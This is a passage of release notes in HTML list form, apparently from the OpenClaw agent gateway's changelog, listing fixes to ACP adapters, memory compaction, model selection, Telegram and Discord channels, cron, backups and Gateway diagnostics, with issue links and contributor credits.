<li>Export/session: keep inline export HTML scripts and vendor libraries injected after template formatting so generated session exports open with the app code, markdown renderer, and syntax highlighter present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4049814084" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41862/hovercard" href="https://github.com/openclaw/openclaw/issues/41862">#41862</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4096932390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49957/hovercard" href="https://github.com/openclaw/openclaw/issues/49957">#49957</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4049813001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41861" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41861/hovercard" href="https://github.com/openclaw/openclaw/pull/41861">#41861</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290760423" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68947" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68947/hovercard" href="https://github.com/openclaw/openclaw/pull/68947">#68947</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briannewman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briannewman">@briannewman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martenzi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martenzi">@martenzi</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/armanddp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/armanddp">@armanddp</a>.</li>
<li>Agents/ACPX: stage the patched Claude ACP adapter as an ACPX runtime dependency and route known Codex/Claude ACP commands through local wrappers, so Gateway runtime no longer depends on live <code>npx</code> adapter resolution. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340321679" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73202" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73202/hovercard" href="https://github.com/openclaw/openclaw/issues/73202">#73202</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Memory/compaction: let pre-compaction memory flush use an exact <code>agents.defaults.compaction.memoryFlush.model</code> override such as <code>ollama/qwen3:8b</code> without inheriting the active session fallback chain, so local housekeeping can avoid paid conversation models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4128881385" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53772" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53772/hovercard" href="https://github.com/openclaw/openclaw/issues/53772">#53772</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/limen96/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/limen96">@limen96</a>.</li>
<li>macOS/update: stop managed Gateway services before package replacement and keep LaunchAgent service secrets out of world-readable plist metadata by loading them from owner-only env files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338237591" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72996" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72996/hovercard" href="https://github.com/openclaw/openclaw/issues/72996">#72996</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mathewb7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mathewb7">@Mathewb7</a>.</li>
<li>Google Meet: keep observe-only Chrome joins and setup checks from requiring BlackHole or audio bridge commands, avoid granting or selecting the microphone in observe-only mode, and make <code>test_speech</code> report fresh realtime output-byte verification instead of only confirming a queued utterance. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Gateway/hooks: route non-delivered hook completion and error summaries to the target agent's main session instead of the default agent session, preserving multi-agent hook isolation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3979541205" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/24693" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/24693/hovercard" href="https://github.com/openclaw/openclaw/issues/24693">#24693</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288898401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68667" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68667/hovercard" href="https://github.com/openclaw/openclaw/pull/68667">#68667</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abersonFAC/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abersonFAC">@abersonFAC</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bluesky6868/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bluesky6868">@bluesky6868</a>.</li>
<li>Control UI/models: request the configured Gateway model-list view so dashboards with only <code>models.providers.*.models</code> show those configured models first instead of flooding the picker with the full built-in catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248445151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65405" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65405/hovercard" href="https://github.com/openclaw/openclaw/issues/65405">#65405</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wbyanclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wbyanclaw">@wbyanclaw</a>.</li>
<li>CLI/models: keep default-model and allowlist pickers on explicit <code>models.providers.*.models</code> entries when <code>models.mode</code> is <code>replace</code> instead of loading the full built-in catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245406045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64950/hovercard" href="https://github.com/openclaw/openclaw/issues/64950">#64950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrozentsvayg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrozentsvayg">@mrozentsvayg</a>.</li>
<li>Media/security: tighten media-understanding MIME sanitization so parameterized MIME values stay end-anchored and malformed whitespace or suffix payloads are rejected before file-context handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3902840056" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/9795" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/9795/hovercard" href="https://github.com/openclaw/openclaw/issues/9795">#9795</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284328200" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68225" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68225/hovercard" href="https://github.com/openclaw/openclaw/pull/68225">#68225</a> with related review/test context from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205684778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61016" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61016/hovercard" href="https://github.com/openclaw/openclaw/pull/61016">#61016</a>/<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287206480" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68456" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68456/hovercard" href="https://github.com/openclaw/openclaw/pull/68456">#68456</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymaxgit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymaxgit">@ymaxgit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bluesky6868/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bluesky6868">@bluesky6868</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shamsulalam1114/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shamsulalam1114">@shamsulalam1114</a>.</li>
<li>Discord: own the Carbon interaction listener and hand off Discord slash/component handling asynchronously, so compaction or long session locks no longer trip <code>InteractionEventListener</code> listener timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340336485" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73204/hovercard" href="https://github.com/openclaw/openclaw/issues/73204">#73204</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/slideshow-dingo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slideshow-dingo">@slideshow-dingo</a>.</li>
<li>Compaction/diagnostics: keep unknown compaction failure classifications stable while logging sanitized detail for unclassified provider errors such as missing Ollama provider adapters. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gzsiang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gzsiang">@gzsiang</a>.</li>
<li>Models/fallbacks: record first-class <code>model.fallback_step</code> trajectory events with from/to models, failure detail, chain position, and final outcome so support exports preserve the primary model failure even when a later fallback also fails. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329116597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71744/hovercard" href="https://github.com/openclaw/openclaw/issues/71744">#71744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nikolaykazakovvs-ux/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nikolaykazakovvs-ux">@nikolaykazakovvs-ux</a>.</li>
<li>Gateway/agents: block agent <code>exec</code> from launching interactive <code>openclaw channels login</code> flows and abort active agent runs after invalid-config recovery restores last-known-good config, preventing known channel-login and reload paths from wedging replies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midhunmonachan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midhunmonachan">@midhunmonachan</a>.</li>
<li>Gateway/diagnostics: emit payload-free liveness warnings with event-loop delay, event-loop utilization, CPU-core ratio, active-session counts, and OTEL warning metrics/spans so live-but-stalled Gateways capture CPU-spin context in stability bundles and telemetry. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midhunmonachan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midhunmonachan">@midhunmonachan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Gateway/startup: keep value-option foreground starts on the gateway fast path and skip proxy bootstrap unless proxy env is configured, reducing normal gateway startup RSS and avoiding full CLI graph loading. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/models: show heartbeat model bleed guidance on context-overflow resets when the last runtime model matches configured <code>heartbeat.model</code>, so smaller local heartbeat models point users to <code>isolatedSession</code> or <code>lightContext</code> instead of only compaction-buffer tuning. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270540769" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67314" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67314/hovercard" href="https://github.com/openclaw/openclaw/issues/67314">#67314</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Knightmare6890/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Knightmare6890">@Knightmare6890</a>.</li>
<li>Subagents/models: persist <code>sessions_spawn.model</code> and configured subagent models as child-session model overrides before the first turn, so spawned subagents actually run on the requested provider/model instead of reverting to the target agent default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340182127" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73180" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73180/hovercard" href="https://github.com/openclaw/openclaw/issues/73180">#73180</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danielzinhu99/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danielzinhu99">@danielzinhu99</a>.</li>
<li>Channels/Telegram: keep webhook-mode local listeners alive and retry Telegram <code>setWebhook</code> registration after recoverable startup network failures, so transient Bot API timeouts no longer leave reverse proxies pointing at a closed listener. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329545775" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71834" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71834/hovercard" href="https://github.com/openclaw/openclaw/issues/71834">#71834</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinon86/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinon86">@jinon86</a>.</li>
<li>Agents/ACPX: bundle the Codex ACP adapter and launch it from the isolated <code>CODEX_HOME</code> wrapper before falling back to npm, so Codex ACP startup no longer depends on live <code>npx</code> resolution or the stale <code>@zed-industries/codex-acp@^0.11.1</code> range. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330344102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72037" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72037/hovercard" href="https://github.com/openclaw/openclaw/issues/72037">#72037</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340321679" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73202" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73202/hovercard" href="https://github.com/openclaw/openclaw/issues/73202">#73202</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jasonftl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jasonftl">@jasonftl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sazora/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sazora">@sazora</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerod26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerod26">@joerod26</a>.</li>
<li>Agents/ACPX: register the embedded ACP backend at Gateway startup through a lightweight ACP backend SDK path and without importing the heavy ACPX runtime until an ACP session or explicit startup probe needs it, reducing baseline Gateway RSS. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/update: keep restart health polling when the restarted Gateway is reachable but has not reported its version yet, so macOS service restarts do not fail early with <code>actual unavailable</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProspectOre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProspectOre">@ProspectOre</a>.</li>
<li>Backup: skip installed plugin <code>extensions/*/node_modules</code> dependency trees while keeping plugin manifests and source files in archives, so local backups avoid rebuildable npm payload bloat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237147053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64144" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64144/hovercard" href="https://github.com/openclaw/openclaw/issues/64144">#64144</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BrilliantWang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BrilliantWang">@BrilliantWang</a>.</li>
<li>Cron/models: fail isolated cron runs closed when an explicit <code>payload.model</code> is not allowed or cannot be resolved, so scheduled jobs do not silently fall back to an unrelated agent default or paid route before configured provider proxies such as LiteLLM can run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339951821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73146" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73146/hovercard" href="https://github.com/openclaw/openclaw/issues/73146">#73146</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oneandrewwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oneandrewwang">@oneandrewwang</a>.</li>
<li>Memory/QMD: back off repeated chat-turn QMD open failures while still letting memory status and CLI probes recheck immediately, so a broken sidecar dependency cannot trigger active-memory or cron retry storms. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340255740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73188" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73188/hovercard" href="https://github.com/openclaw/openclaw/issues/73188">#73188</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340161415" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73176/hovercard" href="https://github.com/openclaw/openclaw/issues/73176">#73176</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leonlushgit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leonlushgit">@leonlushgit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/w3i-William/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/w3i-William">@w3i-William</a>.</li>
<li>Talk Mode: resolve <code>messages.tts.providers.&lt;id&gt;.apiKey</code> through the active runtime snapshot for <code>talk.config</code>, so Talk overlays can discover SecretRef-backed speech providers without falling back to local speech. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339685909" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73109" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73109/hovercard" href="https://github.com/openclaw/openclaw/issues/73109">#73109</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339688293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73111/hovercard" href="https://github.com/openclaw/openclaw/pull/73111">#73111</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Memory/Ollama: resolve <code>memorySearch.provider</code> custom provider ids through their configured <code>models.providers.&lt;id&gt;.api</code> owner, so multi-GPU Ollama setups can dedicate embeddings to providers such as <code>ollama-5080</code> without losing the Ollama adapter or local auth semantics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339962249" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73150" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73150/hovercard" href="https://github.com/openclaw/openclaw/issues/73150">#73150</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oneandrewwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oneandrewwang">@oneandrewwang</a>.</li>
<li>CLI/memory: skip eager context-window warmup for <code>openclaw memory</code> commands so memory search does not race unrelated model metadata discovery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339788493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73123" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73123/hovercard" href="https://github.com/openclaw/openclaw/issues/73123">#73123</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oalansilva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oalansilva">@oalansilva</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>CLI/Telegram: route Telegram <code>message send</code> and poll actions through the running Gateway when available, so packaged installs use the staged <code>grammy</code> runtime deps and CLI sends return instead of hanging after the Telegram channel is active. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339924390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73140" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73140/hovercard" href="https://github.com/openclaw/openclaw/issues/73140">#73140</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oalansilva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oalansilva">@oalansilva</a>.</li>
<li>Plugins/runtime deps: prepare staged bundled plugin dependencies before loading packaged public surfaces, so OpenClaw's Telegram runtime/test facade loads resolve <code>grammy</code> from the managed runtime-deps stage without copying dependencies into the global package root. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339924390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73140" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73140/hovercard" href="https://github.com/openclaw/openclaw/issues/73140">#73140</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oalansilva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oalansilva">@oalansilva</a>.</li>
<li>Agents/exec: emit <code>(no output)</code> for silent exec update and node-host result blocks so Anthropic-compatible providers no longer reject empty tool-result text after quiet commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339725017" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73117" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73117/hovercard" href="https://github.com/openclaw/openclaw/issues/73117">#73117</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pfrederiksen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pfrederiksen">@pfrederiksen</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sanjays2402/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sanjays2402">@Sanjays2402</a>.</li>
<li>Cron/providers: preflight local Ollama and OpenAI-compatible provider endpoints before isolated cron agent turns, record unreachable local providers as skipped runs, and cache dead-endpoint probes so many jobs do not hammer the same stopped local server. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182642667" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58584" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58584/hovercard" href="https://github.com/openclaw/openclaw/issues/58584">#58584</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpeghead/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpeghead">@jpeghead</a>.</li>
<li>Gateway/config: let config reload continue in degraded mode when invalidity is scoped to plugin entries, so incompatible plugin configs can be skipped and the Gateway restart can still pick up the rest of the config after rollbacks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339843720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73131/hovercard" href="https://github.com/openclaw/openclaw/issues/73131">#73131</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adam-Researchh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adam-Researchh">@Adam-Researchh</a>.</li>
<li>Doctor/channels: suppress disabled bundled-plugin blocker warnings when a trusted external plugin owns the configured channel, so Lark/Feishu installs no longer get Feishu repair noise after switching to <code>openclaw-lark</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162464369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56794" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56794/hovercard" href="https://github.com/openclaw/openclaw/issues/56794">#56794</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wuji-tech-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wuji-tech-dev">@wuji-tech-dev</a>.</li>
<li>CLI/status: show skipped fast-path memory checks as <code>not checked</code> and report active custom memory plugin runtime status from <code>status --json --all</code> without requiring built-in <code>agents.defaults.memorySearch</code>, so plugins such as memory-lancedb-pro and memory-cms no longer look unavailable when their own runtime is healthy. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4163904786" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56968/hovercard" href="https://github.com/openclaw/openclaw/issues/56968">#56968</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tony-ooo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tony-ooo">@Tony-ooo</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aderius/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aderius">@aderius</a>.</li>
<li>Gateway/channels: record and log unexpected clean channel monitor exits so channels that return without throwing no longer appear stopped with no error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339623116" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73099" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73099/hovercard" href="https://github.com/openclaw/openclaw/issues/73099">#73099</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/balaji1968-kingler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/balaji1968-kingler">@balaji1968-kingler</a>.</li>
<li>Discord/group chats: keep group/channel replies private by default unless the agent explicitly uses the message tool, so always-on rooms can lurk without leaking automatic final, block, preview, or status-reaction output; <code>messages.groupChat.visibleReplies: "automatic"</code> restores legacy auto-posting. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338908935" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73046" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73046/hovercard" href="https://github.com/openclaw/openclaw/pull/73046">#73046</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
